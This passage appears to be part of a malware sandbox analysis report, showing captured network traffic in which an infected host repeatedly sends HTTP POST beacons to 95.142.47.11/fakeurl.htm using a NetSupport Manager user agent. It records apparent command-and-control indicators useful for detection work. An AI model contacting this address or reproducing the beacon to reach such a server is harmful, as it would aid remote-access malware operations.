                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:24.254832983 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:24.355873108 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:24.753192902 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:24.852796078 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:24.967356920 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:25.068182945 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:25.167798042 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:25.274419069 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:25.373874903 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:25.474813938 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:25.576181889 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:25.675832033 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:25.776830912 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:25.877841949 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:25.978817940 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:26.078788042 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:26.178838968 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:26.278892040 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:26.379879951 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:26.479825020 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:26.580786943 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:26.680814028 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:26.780829906 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:26.881819010 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:26.982820034 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:27.083019018 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:27.183046103 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:27.283917904 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:27.384953022 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:27.486129045 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:27.586951971 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:27.686880112 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:27.786947966 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:27.887094975 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:27.988171101 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:28.088862896 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:28.189879894 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:28.289832115 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:28.389822006 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:28.491080999 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:28.590811014 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:28.690998077 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:28.790813923 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:28.890780926 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:29.092909098 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:29.193881989 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:29.293812990 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:29.394916058 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:29.495874882 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:29.596833944 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:29.696866035 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:29.796804905 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:29.896836996 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:29.997831106 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:30.097846031 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:30.197917938 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:30.297780037 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:30.398802996 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:30.499794960 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:30.600784063 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:30.701803923 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:30.801769972 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:30.902766943 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:31.003751040 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:31.104849100 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:31.205774069 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:31.308805943 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:31.409881115 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:31.510766029 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:31.611740112 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:31.712155104 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
